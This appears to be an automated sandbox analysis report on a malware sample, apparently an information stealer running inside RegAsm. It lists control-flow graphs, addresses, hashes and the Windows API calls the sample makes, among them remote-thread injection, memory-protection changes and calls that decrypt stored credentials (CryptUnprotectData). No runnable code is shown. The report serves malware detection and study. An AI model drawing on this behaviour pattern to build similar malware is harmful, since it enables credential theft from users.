                                                                                                                                              • Opcode ID: f9482c25f429c039ac0933aab2bd20941a630275386bec5fd4093bf855ce4a23
                                                                                                                                              • Instruction ID: 1fd9a57969e2cbbb590d7b10343f600ea94db3348f640734d366f1fe9540334e
                                                                                                                                              • Opcode Fuzzy Hash: f9482c25f429c039ac0933aab2bd20941a630275386bec5fd4093bf855ce4a23
                                                                                                                                              • Instruction Fuzzy Hash: AE129C309002558FCB0ACF69C480AADFFF5AF4E310F69C599E458AB266C731F991CB94
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 01161011 Relevance: 1.6, APIs: 1, Instructions: 69threadinjectionCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 121 1161011-1161072 124 1161074-1161080 121->124 125 1161082-11610c1 CreateRemoteThread 121->125 124->125 126 11610c3-11610c9 125->126 127 11610ca-11610de 125->127 126->127
                                                                                                                                              APIs
                                                                                                                                              • CreateRemoteThread.KERNELBASE(-00000001,00000000,?,?,00000000,?,?), ref: 011610B4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.1849169173.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_1160000_oRkIPIEeryat7GMgjkBr.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateRemoteThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4286614544-0
                                                                                                                                              • Opcode ID: feecc7a73a3fe4051b1c39243376ec349292a5449179f562b38e1280a76128f1
                                                                                                                                              • Instruction ID: 6f89b1c3726dfd1cb55e8369a999eff12f2953a7e19c314396c131024bf54287
                                                                                                                                              • Opcode Fuzzy Hash: feecc7a73a3fe4051b1c39243376ec349292a5449179f562b38e1280a76128f1
                                                                                                                                              • Instruction Fuzzy Hash: E131F2B1900249EFCB14CFA9D984ADEBBF4FF48314F208029E958A7210D375A950CFA4
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 01160500 Relevance: 1.6, APIs: 1, Instructions: 69threadinjectionCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 113 1160500-1161072 116 1161074-1161080 113->116 117 1161082-11610c1 CreateRemoteThread 113->117 116->117 118 11610c3-11610c9 117->118 119 11610ca-11610de 117->119 118->119
                                                                                                                                              APIs
                                                                                                                                              • CreateRemoteThread.KERNELBASE(-00000001,00000000,?,?,00000000,?,?), ref: 011610B4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.1849169173.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_1160000_oRkIPIEeryat7GMgjkBr.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateRemoteThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4286614544-0
                                                                                                                                              • Opcode ID: 0499d15548f0de0872fc683b3db82e487f28742587ca4c17156c1ccc48a5df80
                                                                                                                                              • Instruction ID: addb1a5fe7b2a00f6c23e4a1ec58b60413bb538e0c04e0cc72c96fd74afc5b47
                                                                                                                                              • Opcode Fuzzy Hash: 0499d15548f0de0872fc683b3db82e487f28742587ca4c17156c1ccc48a5df80
                                                                                                                                              • Instruction Fuzzy Hash: C73104B5900249EFCF14CF99D984ADEBBF4FB48310F108029E919A7310D375A950CFA5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 011604F4 Relevance: 1.6, APIs: 1, Instructions: 60memoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 129 11604f4-1160fd6 VirtualProtect 132 1160fdf-1161000 129->132 133 1160fd8-1160fde 129->133 133->132
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(03CE3584,?,?,?), ref: 01160FC9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.1849169173.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_1160000_oRkIPIEeryat7GMgjkBr.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                              • Opcode ID: 0c8df6915ae22d7843f72d471a9061d5f414f7ad9e5e977487b13715d1d5a281
                                                                                                                                              • Instruction ID: 12e95e80e493fd2d375853e23984e049b4c7415a18514553651ecfb6d22225bb
                                                                                                                                              • Opcode Fuzzy Hash: 0c8df6915ae22d7843f72d471a9061d5f414f7ad9e5e977487b13715d1d5a281
                                                                                                                                              • Instruction Fuzzy Hash: 3A2115B1901219EFCB00CF9AC885BDEFBB8FB08310F10816AE918B7240D375A954CFA5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:15.3%
                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                              Signature Coverage:16.1%
                                                                                                                                              Total number of Nodes:311
                                                                                                                                              Total number of Limit Nodes:18
                                                                                                                                              execution_graph 9923 409240 9925 40924a 9923->9925 9924 4092ae ExitProcess 9926 40926b GetStdHandle ExitProcess 9925->9926 9927 40925e 9925->9927 9926->9927 9927->9924 9928 41cf40 9929 41cfa8 9928->9929 9930 41cf4b 9928->9930 9936 4359f0 9930->9936 9932 41cfb7 9932->9932 9933 4359f0 RtlAllocateHeap 9932->9933 9934 41d061 9933->9934 9934->9934 9939 41bd50 9934->9939 9937 435a7a RtlAllocateHeap 9936->9937 9938 435a3e 9936->9938 9937->9932 9938->9937 9942 41be80 9939->9942 9945 43a430 9942->9945 9944 41bed8 9946 43a450 9945->9946 9947 4359f0 RtlAllocateHeap 9946->9947 9949 43a474 9947->9949 9948 43a5ce 9948->9944 9949->9948 9951 435b70 9949->9951 9952 435ba0 9951->9952 9953 435b9d LdrInitializeThunk 9951->9953 9952->9948 9953->9948 9954 435bc0 9956 435c0f 9954->9956 9955 435dde 9957 435b70 LdrInitializeThunk 9956->9957 9958 435c6e 9956->9958 9957->9958 9958->9955 9959 435b70 LdrInitializeThunk 9958->9959 9959->9955 9960 42a245 9961 42a375 SysAllocString 9960->9961 9962 42a335 9960->9962 9963 42a3e7 9961->9963 9962->9961 9967 42f14f 9970 42f610 9967->9970 9971 42f661 9970->9971 9972 4359f0 RtlAllocateHeap 9971->9972 9973 42f719 9972->9973 9974 4265cc 9975 4265d3 9974->9975 9976 4266f2 GetPhysicallyInstalledSystemMemory 9975->9976 9977 42671a 9976->9977 9977->9977 9978 43914c 9979 4391a7 RtlReAllocateHeap 9978->9979 9980 43917d 9978->9980 9981 43926a 9979->9981 9980->9979 9982 4156ce 9983 4359f0 RtlAllocateHeap 9982->9983 9984 4156db 9983->9984 9987 43a8f0 9984->9987 9988 43a944 9987->9988 9990 435b70 LdrInitializeThunk 9988->9990 9991 43a9c8 9988->9991 9989 4156f0 9990->9991 9991->9989 9992 435b70 LdrInitializeThunk 9991->9992 9992->9989 9993 40d5d0 9994 40d59b 9993->9994 9994->9993 9995 40d817 ExitProcess ExitProcess ExitProcess ExitProcess 9994->9995 9997 40d812 9994->9997 9996 40da50 9995->9996 9997->9995 9998 4384d6 9999 4383ad 9998->9999 10000 4385df 9999->10000 10001 4384b4 LoadLibraryW 9999->10001 10002 4384bb 10001->10002 10003 415b57 10004 415b63 10003->10004 10005 4359f0 RtlAllocateHeap 10004->10005 10008 415c9e 10005->10008 10006 4359f0 RtlAllocateHeap 10006->10008 10007 416064 CryptUnprotectData 10007->10008 10008->10006 10008->10007 10009 4151d7 10010 4359f0 RtlAllocateHeap 10009->10010 10011 4151df 10010->10011 10012 43a8f0 LdrInitializeThunk 10011->10012 10013 4151f7 10012->10013 10014 41a8d9 10015 41a8ee 10014->10015 10016 4359f0 RtlAllocateHeap 10015->10016 10017 41aa59 10016->10017 10018 43a430 2 API calls 10017->10018 10019 41aabf 10018->10019 10020 4163d9 10021 4163ed 10020->10021 10022 4359f0 RtlAllocateHeap 10021->10022 10023 416417 10022->10023 10024 4359f0 RtlAllocateHeap 10023->10024 10025 4164e0 10024->10025 10025->10025 10028 43a610 10025->10028 10027 416561 10029 43a630 10028->10029 10030 4359f0 RtlAllocateHeap 10029->10030 10031 43a650 10030->10031 10031->10031 10032 43a78e 10031->10032 10033 435b70 LdrInitializeThunk 10031->10033 10032->10027 10033->10032 10034 419ddc 10035 419ef0 10034->10035 10042 415080 10035->10042 10037 419f51 10038 415080 RtlAllocateHeap LdrInitializeThunk 10037->10038 10039 41a0ac 10038->10039 10040 415080 RtlAllocateHeap LdrInitializeThunk 10039->10040 10041 41a249 10040->10041 10043 4150c0 10042->10043 10043->10043 10044 4359f0 RtlAllocateHeap 10043->10044 10045 41510b 10044->10045 10045->10045 10046 43a430 2 API calls 10045->10046 10047 41518f 10046->10047 10048 419263 10049 419342 10048->10049 10049->10049 10050 415080 2 API calls 10049->10050 10051 4193a1 10050->10051 10052 41c7e2 10053 41c801 10052->10053 10057 41cbf0 10053->10057 10073 4212b0 10053->10073 10054 41c841 10058 41cc06 10057->10058 10063 41ccb0 10057->10063 10059 4359f0 RtlAllocateHeap 10058->10059 10058->10063 10060 41cd17 10059->10060 10060->10060 10061 43a430 2 API calls 10060->10061 10062 41cd8d 10061->10062 10062->10063 10064 4359f0 RtlAllocateHeap 10062->10064 10063->10054 10065 41cd9d 10064->10065 10066 43a8f0 LdrInitializeThunk 10065->10066 10067 41cdaf 10066->10067 10068 4359f0 RtlAllocateHeap 10067->10068 10069 41cdef 10067->10069 10070 41cdfe 10068->10070 10069->10063 10071 435b70 LdrInitializeThunk 10069->10071 10070->10070 10079 409340 10070->10079 10071->10063 10074 4212c9 10073->10074 10078 421430 10073->10078 10075 4359f0 RtlAllocateHeap 10074->10075 10077 421444 10075->10077 10076 41bd50 2 API calls 10076->10078 10077->10076 10077->10077 10078->10054 10080 409470 10079->10080 10082 409360 10079->10082 10081 4359f0 RtlAllocateHeap 10080->10081 10084 4093ae 10081->10084 10083 4359f0 RtlAllocateHeap 10082->10083 10083->10084 10084->10069 10085 4147e5 10086 4147f4 10085->10086 10109 41de10 10086->10109 10088 4147fa 10089 409d20 RtlAllocateHeap 10088->10089 10090 414804 10089->10090 10091 409d20 RtlAllocateHeap 10090->10091 10092 414820 10091->10092 10093 409d20 RtlAllocateHeap 10092->10093 10094 41483f 10093->10094 10095 421670 RtlAllocateHeap LdrInitializeThunk 10094->10095 10096 414854 10095->10096 10097 421f80 RtlAllocateHeap LdrInitializeThunk 10096->10097 10098 41485d 10097->10098 10099 409d20 RtlAllocateHeap 10098->10099 10100 414870 10099->10100 10101 422ff0 RtlAllocateHeap 10100->10101 10102 414885 10101->10102 10103 409d20 RtlAllocateHeap 10102->10103 10104 41488f 10103->10104 10105 424240 RtlAllocateHeap 10104->10105 10106 4148a4 10105->10106 10107 42dde0 6 API calls 10106->10107 10108 4148ad 10107->10108 10110 41de88 10109->10110 10111 4359f0 RtlAllocateHeap 10110->10111 10112 41df1b 10111->10112 10113 4359f0 RtlAllocateHeap 10112->10113 10114 41e024 10113->10114 10114->10114 10115 43a610 2 API calls 10114->10115 10116 41e097 10115->10116 10125 4139e7 10126 4139f4 10125->10126 10131 418640 10126->10131 10128 413a0d 10129 409d20 RtlAllocateHeap 10128->10129 10130 413a1b 10129->10130 10132 418660 10131->10132 10133 4359f0 RtlAllocateHeap 10132->10133 10134 418698 10133->10134 10135 43a610 2 API calls 10134->10135 10136 4186b9 10135->10136 10142 40dbf0 10143 40db7f 10142->10143 10145 40dbfe 10142->10145 10146 4359f0 RtlAllocateHeap 10143->10146 10144 40de0a ExitProcess ExitProcess ExitProcess ExitProcess 10148 40e039 10144->10148 10145->10144 10145->10145 10147 40de08 10145->10147 10149 40db9b 10146->10149 10147->10144 10150 41ed72 10153 43ace0 10150->10153 10155 43ad00 10153->10155 10154 41ed86 10155->10154 10156 435b70 LdrInitializeThunk 10155->10156 10156->10154 10157 418775 10158 4187dd 10157->10158 10159 41be80 2 API calls 10158->10159 10160 418816 10159->10160 10161 4373fe 10162 43744f 10161->10162 10163 4374af 10162->10163 10164 435b70 LdrInitializeThunk 10162->10164 10164->10163 10165 416800 10167 41680c 10165->10167 10166 4168ce 10167->10166 10168 435b70 LdrInitializeThunk 10167->10168 10168->10166 10169 41ed00 10170 41ed14 10169->10170 10173 43ae30 10170->10173 10172 41ed38 10177 43ae84 10173->10177 10174 43aeee 10175 4359f0 RtlAllocateHeap 10174->10175 10180 43afee 10174->10180 10176 43af2b 10175->10176 10179 435b70 LdrInitializeThunk 10176->10179 10176->10180 10177->10174 10178 435b70 LdrInitializeThunk 10177->10178 10178->10174 10179->10180 10180->10172 10181 425183 10182 42518d 10181->10182 10183 425bee GetComputerNameExA 10182->10183 10184 425cdb GetComputerNameExA 10182->10184 10183->10182 10184->10182 10185 412807 10186 412816 10185->10186 10191 4154a0 10186->10191 10188 412829 10189 409d20 RtlAllocateHeap 10188->10189 10190 412833 10189->10190 10192 4154c0 10191->10192 10193 4359f0 RtlAllocateHeap 10192->10193 10194 4154fe 10193->10194 10195 4359f0 RtlAllocateHeap 10194->10195 10196 4155fa 10195->10196 10196->10196 10197 43a430 2 API calls 10196->10197 10198 41567a 10197->10198 10199 416e0b 10202 418070 10199->10202 10203 41811e 10202->10203 10204 4359f0 RtlAllocateHeap 10203->10204 10205 4181ed 10204->10205 10206 4359f0 RtlAllocateHeap 10205->10206 10207 4183e5 10206->10207 10207->10207 10208 41bd50 2 API calls 10207->10208 10209 418566 10208->10209 10210 43890c 10211 43891c 10210->10211 10212 4359f0 RtlAllocateHeap 10211->10212 10214 438927 RtlAllocateHeap 10212->10214 10215 438312 10216 438323 10215->10216 10217 438355 LoadLibraryW 10215->10217 10216->10217 10218 411e90 10218->10218 10220 411e98 10218->10220 10219 41bd50 2 API calls 10221 411f60 10219->10221 10220->10219 10222 41bd50 2 API calls 10221->10222 10223 412040 10222->10223 10224 415390 10225 415396 10224->10225 10226 435b70 LdrInitializeThunk 10225->10226 10227 41546b 10226->10227 10238 415821 10239 415827 10238->10239 10240 4359f0 RtlAllocateHeap 10239->10240 10241 415947 10240->10241 10241->10241 10242 43a430 2 API calls 10241->10242 10243 4159cd 10242->10243 10252 42e6ab 10256 4092e0 10252->10256 10254 42e6b0 KiUserCallbackDispatcher GetSystemMetrics 10255 42e6f8 10254->10255 10256->10254 10257 4340a8 10260 439a30 10257->10260 10259 4340cf GetVolumeInformationW 10261 43822f 10263 4372e0 10261->10263 10262 4382b8 10263->10262 10264 435b70 LdrInitializeThunk 10263->10264 10264->10263 10270 4179b1 10271 415080 2 API calls 10270->10271 10272 4179c3 10271->10272 10273 41ae30 10274 41ae3e 10273->10274 10277 41ae80 10273->10277 10275 4359f0 RtlAllocateHeap 10274->10275 10276 41ae94 10275->10276 10276->10277 10279 418850 10276->10279 10280 418913 10279->10280 10281 415080 2 API calls 10280->10281 10282 418987 10281->10282 10283 4209b6 10284 43ace0 LdrInitializeThunk 10283->10284 10285 4209d1 10284->10285 10292 417239 10293 41727f 10292->10293 10294 415080 2 API calls 10293->10294 10295 4172c5 10294->10295 10296 415080 2 API calls 10295->10296 10298 417355 10296->10298 10297 415080 2 API calls 10299 41742b 10297->10299 10298->10297 10298->10298 10300 415080 2 API calls 10299->10300 10301 4174d5 10300->10301 10302 4359f0 RtlAllocateHeap 10301->10302 10303 4175d0 10302->10303 10303->10303 10304 43a430 2 API calls 10303->10304 10305 41769e 10304->10305

                                                                                                                                              Executed Functions

                                                                                                                                              Function 00421670 Relevance: 10.5, Strings: 8, Instructions: 515COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 76 421670-4216a2 77 4216b0 76->77 78 4216de-421860 76->78 77->78 79 421862 78->79 80 421895-4218ad call 43ace0 78->80 82 421870-421893 79->82 84 421900 80->84 85 421920-42196f call 439100 80->85 86 4218f0 80->86 87 421906-421915 80->87 88 4218b4-4218d8 call 43b130 80->88 89 4218df-4218ea 80->89 82->80 82->82 84->87 94 421be2 85->94 95 421980-4219f3 call 408c50 call 43ae30 85->95 96 421be0 85->96 97 421d40-421d45 85->97 98 421c06-421c4b 85->98 99 421d26-421d30 85->99 100 421a07-421a16 call 43ace0 85->100 101 421d04-421d10 85->101 102 421a2a 85->102 103 421beb-421bef 85->103 104 421ced-421cf6 85->104 105 421bd0-421bd5 85->105 106 421a30-421a85 85->106 107 421bf0 85->107 108 421bf7-421bff 85->108 109 421d17-421d1f 85->109 110 421ade-421ae5 85->110 111 421adc 85->111 112 421cfd-421d02 85->112 86->84 87->85 88->85 88->86 88->89 89->86 94->103 142 4219f8-421a00 95->142 117 421c80-421c88 98->117 118 421c4d-421c4f 98->118 99->94 99->95 99->96 99->97 99->98 99->99 99->100 99->101 99->102 99->103 99->104 99->105 99->106 99->107 99->108 99->109 99->110 99->111 99->112 125 421a1b-421a23 100->125 101->97 101->99 101->109 102->105 103->107 104->97 104->99 104->101 104->109 104->112 105->96 115 421a87 106->115 116 421aba-421ac8 call 43b800 106->116 107->108 108->94 108->95 108->96 108->97 108->98 108->99 108->100 108->101 108->102 108->103 108->104 108->105 108->106 108->107 108->108 108->109 108->110 108->111 108->112 109->94 109->95 109->96 109->98 109->99 109->100 109->101 109->102 109->103 109->104 109->105 109->106 109->107 109->108 109->109 109->110 109->111 109->112 120 421b03 110->120 121 421ae7-421aef 110->121 119 421b11-421b46 111->119 112->101 128 421a90-421ab8 115->128 134 421acd-421ad5 116->134 131 421cd0-421ce6 call 43a210 117->131 132 421c8a-421c95 117->132 129 421c50-421c7e 118->129 126 421b48 119->126 127 421b7e-421b86 119->127 124 421b06-421b0e 120->124 123 421af0-421aff 121->123 123->123 136 421b01 123->136 124->119 125->94 125->96 125->97 125->99 125->101 125->102 125->103 125->104 125->106 125->107 125->108 125->109 125->110 125->111 125->112 138 421b50-421b7c 126->138 127->105 139 421b88-421b92 127->139 128->116 128->128 129->117 129->129 131->97 131->99 131->101 131->104 131->109 131->112 135 421ca0-421ca7 132->135 134->94 134->96 134->97 134->99 134->101 134->103 134->104 134->107 134->108 134->109 134->110 134->111 134->112 140 421cb0-421cb6 135->140 141 421ca9-421cac 135->141 136->124 138->127 138->138 144 421ba0-421ba7 139->144 140->131 146 421cb8-421cc4 call 435b70 140->146 141->135 145 421cae 141->145 142->94 142->96 142->97 142->99 142->100 142->101 142->102 142->103 142->104 142->105 142->106 142->107 142->108 142->109 142->110 142->111 142->112 147 421bb0-421bb6 144->147 148 421ba9-421bac 144->148 145->131 146->131 147->105 151 421bb8-421bc5 call 435b70 147->151 148->144 150 421bae 148->150 150->105 151->105
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: M.C$-Uk$@-t#$U=^3$e!}'$l9h?$m1w7$}%m;
                                                                                                                                              • API String ID: 0-2617895959
                                                                                                                                              • Opcode ID: 858b31ac3e56d838458b62c7e55d528acdb4f791de3a11f7d4d9e133cc0d2170
                                                                                                                                              • Instruction ID: 6a773ac881d51c05e7616f0b7475f283f1ec1e9526ef155ff2a7bcc4ebfbe97b
                                                                                                                                              • Opcode Fuzzy Hash: 858b31ac3e56d838458b62c7e55d528acdb4f791de3a11f7d4d9e133cc0d2170
                                                                                                                                              • Instruction Fuzzy Hash: F90259B5600B008BE328CF25D891B67B7E1FB89705F548A2DD5DA8BBA1EB74F405CB44
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 004216CE Relevance: 10.5, Strings: 8, Instructions: 462COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 155 4216ce-4216d7 156 4216b0 155->156 157 4216de-421860 155->157 156->157 158 421862 157->158 159 421895-4218a2 call 43ace0 157->159 161 421870-421893 158->161 162 4218a7-4218ad 159->162 161->159 161->161 163 421900 162->163 164 421920-42196f call 439100 162->164 165 4218f0 162->165 166 421906-421915 162->166 167 4218b4-4218d8 call 43b130 162->167 168 4218df-4218ea 162->168 163->166 173 421be2 164->173 174 421980-4219d8 call 408c50 164->174 175 421be0 164->175 176 421d40-421d45 164->176 177 421c06-421c4b 164->177 178 421d26-421d30 164->178 179 421a07-421a16 call 43ace0 164->179 180 421d04-421d10 164->180 181 421a2a 164->181 182 421beb-421bef 164->182 183 421ced-421cf6 164->183 184 421bd0-421bd5 164->184 185 421a30-421a85 164->185 186 421bf0 164->186 187 421bf7-421bff 164->187 188 421d17-421d1f 164->188 189 421ade-421ae5 164->189 190 421adc 164->190 191 421cfd-421d02 164->191 165->163 166->164 167->164 167->165 167->168 168->165 173->182 201 4219dd-4219f3 call 43ae30 174->201 196 421c80-421c88 177->196 197 421c4d-421c4f 177->197 178->173 178->174 178->175 178->176 178->177 178->178 178->179 178->180 178->181 178->182 178->183 178->184 178->185 178->186 178->187 178->188 178->189 178->190 178->191 204 421a1b-421a23 179->204 180->176 180->178 180->188 181->184 182->186 183->176 183->178 183->180 183->188 183->191 184->175 194 421a87 185->194 195 421aba-421ac8 call 43b800 185->195 186->187 187->173 187->174 187->175 187->176 187->177 187->178 187->179 187->180 187->181 187->182 187->183 187->184 187->185 187->186 187->187 187->188 187->189 187->190 187->191 188->173 188->174 188->175 188->177 188->178 188->179 188->180 188->181 188->182 188->183 188->184 188->185 188->186 188->187 188->188 188->189 188->190 188->191 199 421b03 189->199 200 421ae7-421aef 189->200 198 421b11-421b46 190->198 191->180 207 421a90-421ab8 194->207 213 421acd-421ad5 195->213 210 421cd0-421ce6 call 43a210 196->210 211 421c8a-421c95 196->211 208 421c50-421c7e 197->208 205 421b48 198->205 206 421b7e-421b86 198->206 203 421b06-421b0e 199->203 202 421af0-421aff 200->202 221 4219f8-421a00 201->221 202->202 215 421b01 202->215 203->198 204->173 204->175 204->176 204->178 204->180 204->181 204->182 204->183 204->185 204->186 204->187 204->188 204->189 204->190 204->191 217 421b50-421b7c 205->217 206->184 218 421b88-421b92 206->218 207->195 207->207 208->196 208->208 210->176 210->178 210->180 210->183 210->188 210->191 214 421ca0-421ca7 211->214 213->173 213->175 213->176 213->178 213->180 213->182 213->183 213->186 213->187 213->188 213->189 213->190 213->191 219 421cb0-421cb6 214->219 220 421ca9-421cac 214->220 215->203 217->206 217->217 223 421ba0-421ba7 218->223 219->210 225 421cb8-421cc4 call 435b70 219->225 220->214 224 421cae 220->224 221->173 221->175 221->176 221->178 221->179 221->180 221->181 221->182 221->183 221->184 221->185 221->186 221->187 221->188 221->189 221->190 221->191 226 421bb0-421bb6 223->226 227 421ba9-421bac 223->227 224->210 225->210 226->184 230 421bb8-421bc5 call 435b70 226->230 227->223 229 421bae 227->229 229->184 230->184
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: M.C$-Uk$@-t#$U=^3$e!}'$l9h?$m1w7$}%m;
                                                                                                                                              • API String ID: 0-2617895959
                                                                                                                                              • Opcode ID: 169af5ad51359e6c2a3cafa0f7d221ece67d597ccbb47c9164488c1cbe9f2b78
                                                                                                                                              • Instruction ID: 87eb36321ec09d9b3df0e99b7a0e046060a02d9914ae414ceb22da4e37e7cf2a
                                                                                                                                              • Opcode Fuzzy Hash: 169af5ad51359e6c2a3cafa0f7d221ece67d597ccbb47c9164488c1cbe9f2b78
                                                                                                                                              • Instruction Fuzzy Hash: 63F137B5200B00CBE328CF25D891B67B7E1FB49705F548A6DD5DA8BAA1EB74F441CB44
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00425183 Relevance: 8.1, APIs: 2, Strings: 2, Instructions: 1113COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: = 'Q$cfbe
                                                                                                                                              • API String ID: 0-911374196
                                                                                                                                              • Opcode ID: 6d61d4dcef794e29638592454722497267c9adfd5ffa75ec27e31235a934c28e
                                                                                                                                              • Instruction ID: bb3565213d9b5af794c0b6c16da6f42ae929365bcb1d7bd06dd9ed2123aaf00f
                                                                                                                                              • Opcode Fuzzy Hash: 6d61d4dcef794e29638592454722497267c9adfd5ffa75ec27e31235a934c28e
                                                                                                                                              • Instruction Fuzzy Hash: B8924970245B908EE726CB35D494BE3BBE1BF17344F84099DD4EB8B282C77AA405CB55
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00409D20 Relevance: 6.7, Strings: 5, Instructions: 468COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 446 409d20-409d33 447 409d35-409d41 446->447 448 409d87-409d89 446->448 449 409d43-409d45 447->449 450 409d8e-409d9b 447->450 451 40a45f-40a468 448->451 452 409d47-409d85 449->452 453 409d9d-409da4 449->453 454 409dd2-409e62 call 406c20 call 433fb0 call 4359f0 450->454 455 409da6-409dbb 452->455 453->455 456 409dbd-409dcd 453->456 463 409ec1-409f18 call 409580 454->463 464 409e64 454->464 455->454 456->454 468 409f45-409fa2 call 409580 463->468 469 409f1a 463->469 465 409e70-409ebf 464->465 465->463 465->465 473 40a002-40a04c call 409580 468->473 474 409fa4 468->474 470 409f20-409f43 469->470 470->468 470->470 478 40a088-40a0d4 473->478 479 40a04e-40a04f 473->479 475 409fb0-40a000 474->475 475->473 475->475 481 40a0d6 478->481 482 40a118-40a17a call 409580 478->482 480 40a050-40a086 479->480 480->478 480->480 483 40a0e0-40a116 481->483 486 40a1c2-40a369 call 409870 482->486 487 40a17c-40a17f 482->487 483->482 483->483 491 40a39a-40a3df 486->491 492 40a36b 486->492 488 40a180-40a1c0 487->488 488->486 488->488 493 40a3e1 491->493 494 40a42a-40a44a call 40e180 call 408c90 491->494 495 40a370-40a398 492->495 496 40a3f0-40a428 493->496 500 40a44f-40a458 494->500 495->491 495->495 496->494 496->496 500->451
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 0$Y!N#$b$j$tQpS
                                                                                                                                              • API String ID: 0-1561506603
                                                                                                                                              • Opcode ID: fbdca97d7b5b8bd9867f2ab60e92d600497daf09618555274c6545db3ae8f586
                                                                                                                                              • Instruction ID: 77bbfa77775ed737320afc19213c5ed02593b238c67c5d09a0c0deb4d33d9e09
                                                                                                                                              • Opcode Fuzzy Hash: fbdca97d7b5b8bd9867f2ab60e92d600497daf09618555274c6545db3ae8f586
                                                                                                                                              • Instruction Fuzzy Hash: 221212B02083819BE324CF15C4A4B5BBBE2BBC6308F545D2DE4D59B392D779D8098B96
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 004384D6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 582 4384d6-43858a call 439a30 * 3 589 4385d4-4385d9 582->589 590 43858c-43858f 582->590 593 4385df 589->593 594 4383ad-438461 call 439a30 * 3 589->594 591 438590-4385d2 590->591 591->589 591->591 601 438463 594->601 602 4384b4-4384b9 LoadLibraryW 594->602 605 438470-4384b2 601->605 603 4384c0-4384d3 602->603 604 4384bb 602->604 604->603 605->602 605->605
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
